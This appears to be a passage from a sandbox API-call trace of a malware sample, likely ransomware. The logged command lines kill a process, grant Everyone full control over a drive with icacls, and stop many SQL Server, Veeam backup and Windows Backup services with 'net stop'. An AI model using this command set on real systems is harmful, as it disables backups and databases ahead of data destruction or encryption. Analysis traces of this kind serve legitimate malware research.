(pv=0x741d20) [0150.423] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM ocomm.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25142d0 | out: lpCommandLine="\"taskkill.exe\" /IM ocomm.exe /F", lpProcessInformation=0x25142d0*(hProcess=0x56c, hThread=0x504, dwProcessId=0xdf8, dwThreadId=0xce0)) returned 1 [0150.432] CloseHandle (hObject=0x558) returned 1 [0150.432] GetFileType (hFile=0x574) returned 0x3 [0150.432] CloseHandle (hObject=0x504) returned 1 [0150.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.866] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.939] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.961] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.970] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.585] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0157.585] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x504, hWritePipe=0x5d8f304*=0x5a0) returned 1 [0157.585] GetCurrentProcess () returned 0xffffffff [0157.585] GetCurrentProcess () returned 0xffffffff [0157.585] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x550) returned 1 [0157.585] CloseHandle (hObject=0x504) returned 1 [0157.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0157.585] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0157.585] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0157.585] CoTaskMemFree (pv=0x741d20) [0157.585] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"icacls\" \"Z:*\" /grant Everyone:F /T /C /Q", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f23c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5a0, hStdError=0x0), lpProcessInformation=0x2275b74 | out: lpCommandLine="\"icacls\" \"Z:*\" /grant Everyone:F /T /C /Q", lpProcessInformation=0x2275b74*(hProcess=0x444, hThread=0x504, dwProcessId=0xa44, dwThreadId=0xefc)) returned 1 [0158.099] CloseHandle (hObject=0x5a0) returned 1 [0158.099] GetFileType (hFile=0x550) returned 0x3 [0158.099] CloseHandle (hObject=0x504) returned 1 [0158.100] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.189] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.619] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.624] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.808] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.831] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.936] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.977] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.985] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.987] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.988] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.990] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0179.086] CoUninitialize () Thread: id = 412 os_tid = 0xd7c [0093.303] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.305] CoGetContextToken (in: pToken=0x5f2f6c4 | out: pToken=0x5f2f6c4) returned 0x0 [0093.306] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5f2f6e8 | out: ppvObject=0x5f2f6e8*=0x6ded34) returned 0x0 [0093.306] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5f2f714 | out: pThreadType=0x5f2f714*=0) returned 0x0 [0093.306] IUnknown:Release (This=0x6ded34) returned 0x0 [0093.306] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0093.306] CoUninitialize () [0095.167] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.167] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3c8, hWritePipe=0x5f2f044*=0x448) returned 1 [0095.168] GetCurrentProcess () returned 0xffffffff [0095.168] GetCurrentProcess () returned 0xffffffff [0095.168] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3f4) returned 1 [0095.168] CloseHandle (hObject=0x3c8) returned 1 [0095.168] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.168] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.168] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.168] CoTaskMemFree (pv=0x741d20) [0095.168] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef8c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24a0398 | out: lpCommandLine="\"net.exe\" stop MSSQL$SYSTEM_BGC /y", lpProcessInformation=0x24a0398*(hProcess=0x3fc, hThread=0x3c8, dwProcessId=0xe04, dwThreadId=0xe08)) returned 1 [0095.493] CloseHandle (hObject=0x448) returned 1 [0095.493] GetFileType (hFile=0x3f4) returned 0x3 [0095.493] CloseHandle (hObject=0x3c8) returned 1 [0095.688] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.688] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3c8, hWritePipe=0x5f2f044*=0x448) returned 1 [0095.688] GetCurrentProcess () returned 0xffffffff [0095.688] GetCurrentProcess () returned 0xffffffff [0095.688] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3a8) returned 1 [0095.688] CloseHandle (hObject=0x3c8) returned 1 [0095.688] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.689] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.689] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.689] CoTaskMemFree (pv=0x741d20) [0095.689] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef84*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24ae444 | out: lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y", lpProcessInformation=0x24ae444*(hProcess=0x42c, hThread=0x3c8, dwProcessId=0xe54, dwThreadId=0xe58)) returned 1 [0095.758] CloseHandle (hObject=0x448) returned 1 [0095.758] GetFileType (hFile=0x3a8) returned 0x3 [0095.758] CloseHandle (hObject=0x3c8) returned 1 [0096.900] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0096.900] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3c8, hWritePipe=0x5f2f044*=0x448) returned 1 [0096.900] GetCurrentProcess () returned 0xffffffff [0096.900] GetCurrentProcess () returned 0xffffffff [0096.900] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3a0) returned 1 [0096.900] CloseHandle (hObject=0x3c8) returned 1 [0096.900] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0096.901] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0096.901] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0096.901] CoTaskMemFree (pv=0x741d20) [0096.901] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ESHASRV /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24bc768 | out: lpCommandLine="\"net.exe\" stop ESHASRV /y", lpProcessInformation=0x24bc768*(hProcess=0x390, hThread=0x3c8, dwProcessId=0xea8, dwThreadId=0xeac)) returned 1 [0096.994] CloseHandle (hObject=0x448) returned 1 [0096.994] GetFileType (hFile=0x3a0) returned 0x3 [0096.995] CloseHandle (hObject=0x3c8) returned 1 [0099.392] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.392] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x448, hWritePipe=0x5f2f044*=0x3f8) returned 1 [0099.392] GetCurrentProcess () returned 0xffffffff [0099.392] GetCurrentProcess () returned 0xffffffff [0099.393] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3c4) returned 1 [0099.393] CloseHandle (hObject=0x448) returned 1 [0099.393] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.393] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0099.393] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0099.393] CoTaskMemFree (pv=0x741d20) [0099.393] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SDRSVC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2271978 | out: lpCommandLine="\"net.exe\" stop SDRSVC /y", lpProcessInformation=0x2271978*(hProcess=0x3b4, hThread=0x448, dwProcessId=0xf0c, dwThreadId=0xf10)) returned 1 [0099.478] CloseHandle (hObject=0x3f8) returned 1 [0099.478] GetFileType (hFile=0x3c4) returned 0x3 [0099.478] CloseHandle (hObject=0x448) returned 1 [0100.350] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.350] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x38c, hWritePipe=0x5f2f044*=0x3f8) returned 1 [0100.350] GetCurrentProcess () returned 0xffffffff [0100.350] GetCurrentProcess () returned 0xffffffff [0100.350] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x414) returned 1 [0100.350] CloseHandle (hObject=0x38c) returned 1 [0100.350] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.350] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.350] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.351] CoTaskMemFree (pv=0x741d20) [0100.351] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2012 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x247e9f0 | out: lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2012 /y", lpProcessInformation=0x247e9f0*(hProcess=0x3cc, hThread=0x38c, dwProcessId=0xf90, dwThreadId=0xf94)) returned 1 [0100.357] CloseHandle (hObject=0x3f8) returned 1 [0100.357] GetFileType (hFile=0x414) returned 0x3 [0100.357] CloseHandle (hObject=0x38c) returned 1 [0101.144] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.144] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x38c, hWritePipe=0x5f2f044*=0x3f8) returned 1 [0101.144] GetCurrentProcess () returned 0xffffffff [0101.144] GetCurrentProcess () returned 0xffffffff [0101.144] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x468) returned 1 [0101.144] CloseHandle (hObject=0x38c) returned 1 [0101.144] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.144] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0101.144] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0101.144] CoTaskMemFree (pv=0x741d20) [0101.144] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop FA_Scheduler /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x248cd10 | out: lpCommandLine="\"net.exe\" stop FA_Scheduler /y", lpProcessInformation=0x248cd10*(hProcess=0x464, hThread=0x38c, dwProcessId=0xba0, dwThreadId=0x5a8)) returned 1 [0102.162] CloseHandle (hObject=0x3f8) returned 1 [0102.168] GetFileType (hFile=0x468) returned 0x3 [0102.168] CloseHandle (hObject=0x38c) returned 1 [0103.163] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.163] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.164] GetCurrentProcess () returned 0xffffffff [0103.164] GetCurrentProcess () returned 0xffffffff [0103.164] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3b4) returned 1 [0103.164] CloseHandle (hObject=0x3f8) returned 1 [0103.164] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.164] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.164] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.164] CoTaskMemFree (pv=0x741d20) [0103.164] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef7c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x2272048 | out: lpCommandLine="\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessInformation=0x2272048*(hProcess=0x464, hThread=0x3f8, dwProcessId=0x7d8, dwThreadId=0x4e0)) returned 1 [0103.169] CloseHandle (hObject=0x470) returned 1 [0103.170] GetFileType (hFile=0x3b4) returned 0x3 [0103.170] CloseHandle (hObject=0x3f8) returned 1 [0103.170] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.170] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.171] GetCurrentProcess () returned 0xffffffff [0103.171] GetCurrentProcess () returned 0xffffffff [0103.171] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x37c) returned 1 [0103.171] CloseHandle (hObject=0x3f8) returned 1 [0103.171] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.171] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.171] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.171] CoTaskMemFree (pv=0x741d20) [0103.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef6c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x23ce5dc | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$PROFXENGAGEMENT /y", lpProcessInformation=0x23ce5dc*(hProcess=0x394, hThread=0x3f8, dwProcessId=0x4bc, dwThreadId=0xcec)) returned 1 [0103.176] CloseHandle (hObject=0x470) returned 1 [0103.176] GetFileType (hFile=0x37c) returned 0x3 [0103.176] CloseHandle (hObject=0x3f8) returned 1 [0103.177] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.177] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3f8, hWritePipe=0x5f2f044*=0x470) returned 1 [0103.177] GetCurrentProcess () returned 0xffffffff [0103.177] GetCurrentProcess () returned 0xffffffff [0103.177] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3f0) returned 1 [0103.177] CloseHandle 